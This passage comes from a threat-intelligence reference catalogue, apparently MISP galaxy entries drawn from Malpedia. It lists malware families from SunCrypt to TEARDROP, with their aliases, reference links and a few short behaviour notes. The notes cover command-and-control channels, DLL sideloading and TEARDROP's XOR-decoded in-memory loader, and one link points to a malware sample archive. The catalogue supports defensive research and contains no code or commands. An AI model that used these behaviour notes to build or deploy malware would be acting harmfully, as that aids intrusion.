https://www.crowdstrike.com/blog/crowdstrike-launches-free-tool-to-identify-and-help-mitigate-risks-in-azure-active-directory/
https://twitter.com/cybercdh/status/1338975171093336067
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sunburst-supply-chain-attack-solarwinds
https://securelist.com/sunburst-connecting-the-dots-in-the-dns-requests/99862/
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-sunburst-sending-data
https://www.justice.gov/opa/pr/department-justice-statement-solarwinds-update
https://blog.cloudflare.com/a-quirk-in-the-sunburst-dga-algorithm/
https://gist.github.com/olafhartong/71ffdd4cab4b6acd5cbcd1a0691ff82f
https://github.com/cisagov/CHIRP
https://mp.weixin.qq.com/s/UqXC1vovKUu97569LkYm2Q
https://www.trustedsec.com/blog/solarwinds-orion-and-unc2452-summary-and-recommendations/
https://www.splunk.com/en_us/blog/security/smoothing-the-bumps-of-onboarding-threat-indicators-into-splunk-enterprise-security.html
https://www.cisa.gov/supply-chain-compromise
https://blog.gigamon.com/2021/07/27/ghosts-on-the-wire-expanding-conceptions-of-network-anomalies/
https://www.comae.com/posts/sunburst-memory-analysis/
https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/
https://msrc-blog.microsoft.com/2020/12/31/microsoft-internal-solorigate-investigation-update/
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf
https://us-cert.cisa.gov/ncas/alerts/aa21-077a
https://blog.talosintelligence.com/2020/12/solarwinds-supplychain-coverage.html#more
https://medium.com/insomniacs/a-look-into-sunbursts-dga-ba4029193947
https://docs.google.com/spreadsheets/d/1u0_Df5OMsdzZcTkBDiaAtObbIOkMa5xbeXdKk_k0vWs
https://techcommunity.microsoft.com/t5/azure-sentinel/solarwinds-post-compromise-hunting-with-azure-sentinel/ba-p/1995095
https://www.elastic.co/blog/supervised-and-unsupervised-machine-learning-for-dga-detection
https://twitter.com/KimZetter/status/1338305089597964290
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-unique-dga
https://unit42.paloaltonetworks.com/fireeye-solarstorm-sunburst/
https://www.cyberark.com/resources/threat-research-blog/golden-saml-revisited-the-solorigate-connection
https://www.bleepingcomputer.com/news/security/mimecast-links-security-breach-to-solarwinds-hackers/
https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/
https://www.aon.com/cyber-solutions/aon_cyber_labs/cloudy-with-a-chance-of-persistent-email-access/
https://research.checkpoint.com/2020/sunburst-teardrop-and-the-netsec-new-normal/
https://us-cert.cisa.gov/sites/default/files/publications/SolarWinds_and_AD-M365_Compromise-Detecting_APT_Activity_from_Known_TTPs.pdf
https://www.bleepingcomputer.com/news/security/autodesk-reveals-it-was-targeted-by-russian-solarwinds-hackers/
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware
https://www.microsoft.com/security/blog/2020/12/28/using-microsoft-365-defender-to-coordinate-protection-against-solorigate/
https://go.recordedfuture.com/hubfs/reports/pov-2020-1230.pdf
https://www.microsoft.com/security/blog/2021/02/25/microsoft-open-sources-codeql-queries-used-to-hunt-for-solorigate-activity/
https://us-cert.cisa.gov/ncas/current-activity/2020/12/13/active-exploitation-solarwinds-software
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/how-a-device-to-cloud-architecture-defends-against-the-solarwinds-supply-chain-compromise/
https://www.ironnet.com/blog/a-closer-look-at-the-solarwinds/sunburst-malware-dga-or-dns-tunneling
https://www.accenture.com/us-en/blogs/cyber-defense/threat-intel-takeaways-solarigate
https://www.youtube.com/watch?v=-Vsgmw2G4Wo
https://blog.prevasio.com/2020/12/sunburst-backdoor-deeper-look-into.html
https://www.youtube.com/watch?v=JoMwrkijTZ8
https://community.ibm.com/community/user/security/blogs/gladys-koskas1/2020/12/18/sunburst-indicator-detection-in-qradar
https://www.securonix.com/web/wp-content/uploads/2020/12/threat_research_solarwinds_sunburst_eclipser_supply_chain.pdf
https://zengo.com/ungilded-secrets-a-new-paradigm-for-key-security/
https://www.cisa.gov/news/2021/01/05/joint-statement-federal-bureau-investigation-fbi-cybersecurity-and-infrastructure
https://blog.cloudflare.com/solarwinds-orion-compromise-trend-data/
https://msrc-blog.microsoft.com/2020/12/21/december-21st-2020-solorigate-resource-center/
https://www.ironnet.com/blog/solarwinds/sunburst-behavioral-analytics-and-collective-defense-in-action
https://securelist.com/sunburst-backdoor-kazuar/99981/
https://pastebin.com/6EDgCKxd
https://www.youtube.com/watch?v=mbGN1xqy1jY
https://www.gov.pl/web/diplomacy/statement-on-solar-winds-orion-cyberattacks
https://community.riskiq.com/article/9a515637
https://www.solarwinds.com/securityadvisory/faq
https://blog.apiiro.com/detect-and-prevent-the-solarwinds-build-time-code-injection-attack
https://blog.prevasio.com/2020/12/sunburst-backdoor-part-iii-dga-security.html
https://www.domaintools.com/resources/blog/unraveling-network-infrastructure-linked-to-the-solarwinds-hack
https://twitter.com/FireEye/status/1339295983583244302
https://mitre-attack.github.io/attack-navigator/#layerURL=https://raw.githubusercontent.com/center-for-threat-informed-defense/public-resources/master/solorigate/UNC2452.json
https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:MSIL/Solorigate.B!dha
https://www.domaintools.com/resources/blog/change-in-perspective-on-the-utility-of-sunburst-related-network-indicators#
https://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a
https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html
https://thenewstack.io/behind-the-scenes-of-the-sunburst-attack/
https://news.sophos.com/en-us/2020/12/21/how-sunburst-malware-does-defense-evasion/
https://youtu.be/Ta_vatZ24Cs?t=59
https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html
https://www.nato.int/cps/en/natolive/official_texts_183168.htm?selectedLocale=en
https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf
https://www.cadosecurity.com/post/responding-to-solarigate
https://www.picussecurity.com/resource/blog/ttps-used-in-the-solarwinds-breach
https://www.microsoft.com/security/blog/2021/01/14/increasing-resilience-against-solorigate-and-other-sophisticated-attacks-with-microsoft-defender/
https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/
https://news.sophos.com/en-us/2020/12/14/solarwinds-playbook/
https://twitter.com/ItsReallyNick/status/1338382939835478016
https://corelight.blog/2020/12/15/finding-sunburst-backdoor-with-zeek-logs-and-corelight/
https://blog.reversinglabs.com/blog/sunburst-the-next-level-of-stealth
https://mp.weixin.qq.com/s/lh7y_KHUxag_-pcFBC7d0Q
https://www.fireeye.com/blog/products-and-services/2021/02/light-in-the-dark-hunting-for-sunburst.html
https://techcommunity.microsoft.com/t5/azure-active-directory-identity/azure-ad-workbook-to-help-you-assess-solorigate-risk/ba-p/2010718
https://www.sec.gov/ix?doc=/Archives/edgar/data/1739942/000173994221000076/swi-20210507.htm
https://blogs.microsoft.com/on-the-issues/2020/12/17/cyberattacks-cybersecurity-solarwinds-fireeye/
https://unit42.paloaltonetworks.com/solarstorm-supply-chain-attack-timeline
https://www.youtube.com/watch?v=LA-XE5Jy2kU
https://therecord.media/solarwinds-says-fewer-than-100-customers-were-impacted-by-supply-chain-attack
https://fidelissecurity.com/threatgeek/data-protection/ongoing-analysis-solarwinds-impact/
https://netresec.com/?b=2113a6a
https://www.zscaler.com/blogs/security-research/hitchhikers-guide-solarwinds-incident-response
https://www.fireeye.com/current-threats/sunburst-malware.html
https://www.fireeye.com/blog/threat-research/2020/12/sunburst-additional-technical-details.html
https://github.com/fireeye/sunburst_countermeasures
https://twitter.com/Intel471Inc/status/1339233255741120513
https://www.cyborgsecurity.com/blog/sunburst-solarwinds-supply-chain-attack/
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-sunburst-command-control
https://www.a12d404.net/ranting/2021/01/17/msbuild-backdoor.html
https://blog.truesec.com/2020/12/17/the-solarwinds-orion-sunburst-supply-chain-attack/
https://techcommunity.microsoft.com/t5/azure-active-directory-identity/understanding-quot-solorigate-quot-s-identity-iocs-for-identity/ba-p/2007610
https://github.com/SentineLabs/SolarWinds_Countermeasures
https://us-cert.cisa.gov/ncas/analysis-reports/ar21-134a
https://www.4hou.com/posts/KzZR
https://www.mimecast.com/blog/important-security-update/
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-attacks-stealthy-attackers-attempted-evade-detection
https://www.splunk.com/en_us/blog/security/sunburst-backdoor-detections-in-splunk.html
https://twitter.com/lordx64/status/1338526166051934213
https://www.netresec.com/?page=Blog&month=2020-12&post=Reassembling-Victim-Domain-Fragments-from-SUNBURST-DNS
https://us-cert.cisa.gov/ncas/alerts/aa21-008a
https://vrieshd.medium.com/finding-sunburst-victims-and-targets-by-using-passivedns-osint-68f5704a3cdc
https://github.com/fireeye/Mandiant-Azure-AD-Investigator
https://www.consilium.europa.eu/en/press/press-releases/2021/04/15/declaration-by-the-high-representative-on-behalf-of-the-european-union-expressing-solidarity-with-the-united-states-on-the-impact-of-the-solarwinds-cyber-operation
https://www.wired.com/story/hacker-lexicon-what-is-a-supply-chain-attack/
https://www.bleepingcomputer.com/news/security/nasa-and-the-faa-were-also-breached-by-the-solarwinds-hackers/
https://www.mimecast.com/incident-report/
https://vxug.fakedoma.in/samples/Exotic/UNC2452/SolarWinds%20Breach/
https://twitter.com/cybercdh/status/1338885244246765569
https://research.checkpoint.com/2021/deep-into-the-sunburst-attack/
https://labs.sentinelone.com/solarwinds-sunburst-backdoor-inside-the-stealthy-apt-campaign/
https://www.fortinet.com/blog/threat-research/what-we-have-learned-so-far-about-the-sunburst-solarwinds-hack
https://www.bleepingcomputer.com/news/security/fireeye-microsoft-create-kill-switch-for-solarwinds-backdoor/
https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/
https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware

SunCrypt

The tag is: misp-galaxy:malpedia="SunCrypt"

SunCrypt is also known as:

Table 2706. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.suncrypt
https://pcsxcetrasupport3.wordpress.com/2021/03/28/suncrypt-powershell-obfuscation-shellcode-and-more-yara/
https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/
https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/
https://www.bleepingcomputer.com/news/security/suncrypt-ransomware-sheds-light-on-the-maze-ransomware-cartel/
https://medium.com/s2wlab/w4-july-en-story-of-the-week-ransomware-on-the-darkweb-c61965d0386a
https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf
https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/
https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3
https://medium.com/@sapphirex00/diving-into-the-sun-suncrypt-a-new-neighbour-in-the-ransomware-mafia-d89010c9df83
https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel
https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion
https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html
https://www.intezer.com/blog/malware-analysis/when-viruses-mutate-did-suncrypt-ransomware-evolve-from-qnapcrypt
https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer
https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf
https://medium.com/s2wlab/case-analysis-of-suncrypt-ransomware-negotiation-and-bitcoin-transaction-43a2194ac0bc

SunOrcal

The tag is: misp-galaxy:malpedia="SunOrcal"

SunOrcal is also known as:

Table 2707. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.sunorcal
https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/
http://pwc.blogs.com/cyber_security_updates/2016/03/index.html

SUPERNOVA

The tag is: misp-galaxy:malpedia="SUPERNOVA"

SUPERNOVA is also known as:

Table 2708. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.supernova
https://www.splunk.com/en_us/blog/security/supernova-redux-with-a-generous-portion-of-masquerading.html
https://github.com/fireeye/sunburst_countermeasures
https://labs.sentinelone.com/solarwinds-understanding-detecting-the-supernova-webshell-trojan/
https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf
https://www.guidepointsecurity.com/supernova-solarwinds-net-webshell-analysis/
https://us-cert.cisa.gov/ncas/alerts/aa21-008a
https://www.anquanke.com/post/id/226029
https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a
https://www.solarwinds.com/securityadvisory/faq
https://www.solarwinds.com/securityadvisory
https://us-cert.cisa.gov/ncas/analysis-reports/ar21-027a
https://unit42.paloaltonetworks.com/solarstorm-supernova/
https://www.trendmicro.com/en_us/research/20/l/overview-of-recent-sunburst-targeted-attacks.html
https://github.com/fireeye/sunburst_countermeasures/pull/5
https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/
https://www.youtube.com/watch?v=7WX5fCEzTlA
https://www.secureworks.com/blog/supernova-web-shell-deployment-linked-to-spiral-threat-group
https://twitter.com/MalwareRE/status/1342888881373503488
https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html
https://www.splunk.com/en_us/blog/security/detecting-supernova-malware-solarwinds-continued.html

SuppoBox

The tag is: misp-galaxy:malpedia="SuppoBox"

SuppoBox is also known as:

Bayrob
Nivdort

Table 2709. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.suppobox
https://www.symantec.com/connect/blogs/trojanbayrob-strikes-again-1
https://media.blackhat.com/us-13/US-13-Geffner-End-To-End-Analysis-of-a-Domain-Generating-Algorithm-Malware-Family-WP.pdf
https://www.justice.gov/opa/pr/two-romanian-cybercriminals-convicted-all-21-counts-relating-infecting-over-400000-victim
https://www.symantec.com/connect/blogs/bayrob-three-suspects-extradited-face-charges-us

surtr

The tag is: misp-galaxy:malpedia="surtr"

surtr is also known as:

Table 2710. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.surtr
https://citizenlab.ca/2013/08/surtr-malware-family-targeting-the-tibetan-community/

swen

The tag is: misp-galaxy:malpedia="swen"

swen is also known as:

Table 2711. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.swen
https://en.wikipedia.org/wiki/Swen_(computer_worm)

Sword

The tag is: misp-galaxy:malpedia="Sword"

Sword is also known as:

Table 2712. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.sword
https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf

sykipot

The tag is: misp-galaxy:malpedia="sykipot"

sykipot is also known as:

Wkysol
getkys

Table 2713. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.sykipot
https://www.alienvault.com/blogs/labs-research/sykipot-is-back
https://community.rsa.com/thread/185437
https://www.secureworks.com/research/threat-profiles/bronze-edison
https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf
https://blog.trendmicro.com/trendlabs-security-intelligence/sykipot-now-targeting-us-civil-aviation-sector-information/
https://www.symantec.com/connect/blogs/sykipot-attacks

SynAck

The tag is: misp-galaxy:malpedia="SynAck"

SynAck is also known as:

Table 2714. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.synack
https://therecord.media/synack-ransomware-gang-releases-decryption-keys-for-old-victims/
https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/

SyncCrypt

The tag is: misp-galaxy:malpedia="SyncCrypt"

SyncCrypt is also known as:

Table 2715. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.synccrypt
https://www.bleepingcomputer.com/news/security/synccrypt-ransomware-hides-inside-jpg-files-appends-kk-extension/

SynFlooder

The tag is: misp-galaxy:malpedia="SynFlooder"

SynFlooder is also known as:

Table 2716. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.synflooder
https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf

Synth Loader

The tag is: misp-galaxy:malpedia="Synth Loader"

Synth Loader is also known as:

Table 2717. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.synth_loader

Sys10

The tag is: misp-galaxy:malpedia="Sys10"

Sys10 is also known as:

Table 2718. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.sys10
https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/TheNaikonAPT-MsnMM1.pdf
https://securelist.com/analysis/publications/69953/the-naikon-apt/
https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf

Syscon

SYSCON is a Remote Access Trojan used in a targeted champing against US government agencies. It has been recently observed in conjunction with CARROTBAT and CARROTBALL downloaders and it uses the File Transfer Protocol as Command and Control channel. Use of the family is attributed by Unit 42 to the Konni Group.

The tag is: misp-galaxy:malpedia="Syscon"

Syscon is also known as:

Table 2719. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.syscon
https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/
https://unit42.paloaltonetworks.com/the-fractured-statue-campaign-u-s-government-targeted-in-spear-phishing-attacks/
http://blog.trendmicro.com/trendlabs-security-intelligence/syscon-backdoor-uses-ftp-as-a-cc-channel/

SysGet

The tag is: misp-galaxy:malpedia="SysGet"

SysGet is also known as:

Table 2720. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.sysget
http://researchcenter.paloaltonetworks.com/2017/01/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/
http://csecybsec.com/download/zlab/20180713_CSE_APT28_X-Agent_Op-Roman%20Holiday-Report_v6_1.pdf

SysKit

The tag is: misp-galaxy:malpedia="SysKit"

SysKit is also known as:

IvizTech
MANGOPUNCH

Table 2721. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.syskit
https://blog.talosintelligence.com/2019/09/tortoiseshell-fake-veterans.html
https://twitter.com/QW5kcmV3/status/1176861114535165952
https://about.fb.com/news/2021/07/taking-action-against-hackers-in-iran/
https://www.symantec.com/blogs/threat-intelligence/tortoiseshell-apt-supply-chain
https://www.darkreading.com/threat-intelligence/iranian-government-hackers-target-us-veterans/d/d-id/1335897
https://www.proofpoint.com/us/blog/threat-insight/i-knew-you-were-trouble-ta456-targets-defense-contractor-alluring-social-media

Sysraw Stealer

Sysraw stealer got its name because at some point, it was started as "ZSysRaw\sysraw.exe". PDB strings suggest the name "Clipsa" though. First stage connects to /WPCoreLog/, the second one to /WPSecurity/. Its behavior suggest that it is an info stealer. It creates a rather large amount of files in a subdirectory (e.g. data) named "1?[-+].dat" and POSTs them.

The tag is: misp-galaxy:malpedia="Sysraw Stealer"

Sysraw Stealer is also known as:

Clipsa

Table 2722. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.sysraw_stealer
https://decoded.avast.io/janrubin/clipsa-multipurpose-password-stealer/
https://zerophagemalware.com/2017/09/21/rig-ek-via-rulan-drops-an-infostealer/

SysScan

The tag is: misp-galaxy:malpedia="SysScan"

SysScan is also known as:

Table 2723. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.sysscan

SystemBC

SystemBC is a proxy malware leveraging SOCKS5. Based on screenshots used in ads on a underground marketplace, Proofpoint decided to call it SystemBC.

SystemBC has been observed occasionally, but more pronounced since June 2019. First samples goes back to October 2018.

The tag is: misp-galaxy:malpedia="SystemBC"

SystemBC is also known as:

Table 2724. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.systembc
https://isc.sans.edu/forums/diary/Excel+spreadsheets+push+SystemBC+malware/27060/
https://www.proofpoint.com/us/threat-insight/post/systembc-christmas-july-socks5-malware-and-exploit-kits
https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor
https://news.sophos.com/en-us/2021/04/21/nearly-half-of-malware-now-use-tls-to-conceal-communications/
https://blog.reversinglabs.com/blog/code-reuse-across-packers-and-dll-loaders
https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html
https://medium.com/walmartglobaltech/inside-the-systembc-malware-as-a-service-9aa03afd09c6
https://news.sophos.com/en-us/2020/10/14/inside-a-new-ryuk-ransomware-attack/
https://labs.f-secure.com/blog/prelude-to-ransomware-systembc/
https://news.sophos.com/en-us/2020/12/16/systembc/

Szribi

The tag is: misp-galaxy:malpedia="Szribi"

Szribi is also known as:

Table 2725. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.szribi
https://www.virusbulletin.com/virusbulletin/2007/11/spam-kernel
https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf
https://www.fireeye.com/blog/threat-research/2008/11/technical-details-of-srizbis-domain-generation-algorithm.html
https://www.secureworks.com/research/srizbi

TabMsgSQL

The tag is: misp-galaxy:malpedia="TabMsgSQL"

TabMsgSQL is also known as:

Table 2726. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.tabmsgsql
https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf

taidoor

The tag is: misp-galaxy:malpedia="taidoor"

taidoor is also known as:

simbot

Table 2727. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.taidoor
https://www.fireeye.com/blog/threat-research/2013/09/evasive-tactics-taidoor-3.html
https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf
https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf
https://us-cert.cisa.gov/ncas/analysis-reports/ar20-216a
https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp_the_taidoor_campaign.pdf
http://contagiodump.blogspot.com/2011/10/sep-28-cve-2010-3333-manuscript-with.html
https://blog.reversinglabs.com/blog/taidoor-a-truly-persistent-threat
https://www.nttsecurity.com/docs/librariesprovider3/resources/taidoor%E3%82%92%E7%94%A8%E3%81%84%E3%81%9F%E6%A8%99%E7%9A%84%E5%9E%8B%E6%94%BB%E6%92%83%E8%A7%A3%E6%9E%90%E3%83%AC%E3%83%9D%E3%83%BC%E3%83%88_v1
https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf

TAINTEDSCRIBE

The tag is: misp-galaxy:malpedia="TAINTEDSCRIBE"

TAINTEDSCRIBE is also known as:

Table 2728. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.taintedscribe
https://www.us-cert.gov/ncas/analysis-reports/ar20-133b
https://blog.reversinglabs.com/blog/hidden-cobra

Taleret

The tag is: misp-galaxy:malpedia="Taleret"

Taleret is also known as:

Table 2729. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.taleret
https://www.fireeye.com/blog/threat-research/2013/09/evasive-tactics-taidoor-3.html
http://contagioexchange.blogspot.com/2013/08/taleret-strings-apt-1.html

Tandfuy

The tag is: misp-galaxy:malpedia="Tandfuy"

Tandfuy is also known as:

Table 2730. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.tandfuy

Tapaoux

The tag is: misp-galaxy:malpedia="Tapaoux"

Tapaoux is also known as:

Table 2731. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.tapaoux

Tarsip

The tag is: misp-galaxy:malpedia="Tarsip"

Tarsip is also known as:

Table 2732. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.tarsip
https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf

Taurus Stealer

According to Zscaler, Taurus is a stealer that surfaced in June 2020. It is being developed by the author(s) that previously created Predator the Thief. The name overlaps partly with the StealerOne / Terra* family (also aliased Taurus Loader) but appears to be a completely disjunct project.

The tag is: misp-galaxy:malpedia="Taurus Stealer"

Taurus Stealer is also known as:

Table 2733. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.taurus_stealer
https://blog.morphisec.com/google-ppc-ads-deliver-redline-taurus-and-mini-redline-infostealers
https://www.zscaler.com/blogs/research/taurus-new-stealer-town
https://blog.minerva-labs.com/taurus-stealers-evolution
https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md
https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/an-in-depth-analysis-of-the-new-taurus-stealer/

TClient

Steve Miller pointed out that it is proxy-aware (Tencent) for C&C communication and uses wolfSSL, which makes it stick out.

The tag is: misp-galaxy:malpedia="TClient"

TClient is also known as:

FIRESHADOW

Table 2734. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.tclient
https://twitter.com/stvemillertime/status/1266050369370677249

tDiscoverer

The tag is: misp-galaxy:malpedia="tDiscoverer"

tDiscoverer is also known as:

HAMMERTOSS
HammerDuke

Table 2735. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.tdiscoverer
https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf
https://securityintelligence.com/hammertoss-what-me-worry/
https://www.youtube.com/watch?v=UE9suwyuic8

TDTESS

The tag is: misp-galaxy:malpedia="TDTESS"

TDTESS is also known as:

Table 2736. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.tdtess
http://www.clearskysec.com/tulip/

TeamBot

Recently, Check Point researchers spotted a targeted attack against officials within government finance authorities and representatives in several embassies in Europe. The attack, which starts with a malicious attachment disguised as a top secret US document, weaponizes TeamViewer, the popular remote access and desktop sharing software, to gain full control of the infected computer. This is achieved by sideloading another DLL among the legit TeamViewer.

The tag is: misp-galaxy:malpedia="TeamBot"

TeamBot is also known as:

FINTEAM

Table 2737. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.teambot
https://research.checkpoint.com/finteam-trojanized-teamviewer-against-government-targets/

TeamSpy

The tag is: misp-galaxy:malpedia="TeamSpy"

TeamSpy is also known as:

TVRAT
TVSPY
TeamViewerENT

Table 2738. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.teamspy
https://thedfirreport.com/2020/04/24/ursnif-via-lolbins/
https://blog.avast.com/a-deeper-look-into-malware-abusing-teamviewer
https://blog.trendmicro.com/trendlabs-security-intelligence/unsupported-teamviewer-versions-exploited-backdoors-keylogging
https://www.cyber.nj.gov/threat-center/threat-profiles/trojan-variants/spy-agent

TEARDROP

TEARDROP is a memory only dropper that runs as a service, spawns a thread and reads from the file “gracious_truth.jpg”, which likely has a fake JPG header. Next it checks that HKU\SOFTWARE\Microsoft\CTF exists, decodes an embedded payload using a custom rolling XOR algorithm and manually loads into memory an embedded payload using a custom PE-like file format. TEARDROP does not have code overlap with any previously seen malware. FireEye believe that this was used to execute a customized Cobalt Strike BEACON.

The tag is: misp-galaxy:malpedia="TEARDROP"

TEARDROP is also known as:

Table 2739. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.teardrop
https://www.brighttalk.com/webcast/7451/462719
https://blog.securehat.co.uk/malware-analysis/extracting-the-cobalt-strike-config-from-a-teardrop-loader
https://twitter.com/craiu/status/1339954817247158272
https://www.youtube.com/watch?v=GfbxHy6xnbA
https://unit42.paloaltonetworks.com/solarstorm-supply-chain-attack-timeline
https://www.youtube.com/watch?v=LA-XE5Jy2kU
https://msrc-blog.microsoft.com/2020/12/21/december-21st-2020-solorigate-resource-center/
https://github.com/fireeye/sunburst_countermeasures
https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf
https://blog.talosintelligence.com/2020/12/solarwinds-supplychain-coverage.html#more
https://www.sans.org/webcasts/contrarian-view-solarwinds-119515
https://twitter.com/TheEnergyStory/status/1346096298311741440
https://www.fortinet.com/blog/threat-research/what-we-have-learned-so-far-about-the-sunburst-solarwinds-hack
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sunburst-supply-chain-attack-solarwinds
https://us-cert.cisa.gov/ncas/analysis-reports/ar21-039b
https://symantec.broadcom.com/hubfs/Attacks-Against-Government-Sector.pdf
https://orangematter.solarwinds.com/2021/01/11/new-findings-from-our-investigation-of-sunburst/
https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/
https://twitter.com/TheEnergyStory/status/1342041055563313152
https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html
https://research.checkpoint.com/2020/sunburst-teardrop-and-the-netsec-new-normal/
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware
